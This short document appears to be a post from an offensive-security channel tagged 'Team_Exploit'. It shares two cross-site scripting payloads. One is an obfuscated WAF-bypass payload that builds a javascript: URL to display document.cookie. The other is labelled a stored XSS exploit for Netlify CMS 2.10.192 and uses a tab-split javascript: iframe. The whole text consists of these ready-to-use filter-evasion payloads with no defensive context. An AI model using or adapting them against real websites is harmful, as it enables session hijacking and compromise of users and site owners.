XSS WAF Bypass using location
Bypass :
#Bypass | #XSS
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
Bypass :
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#Bypass | #XSS
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
Exploit for Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
Payload :
#Bypass #XSS
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
Payload :
<iframe src=java	sc	ript:al	ert()></iframe>
#Bypass #XSS
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit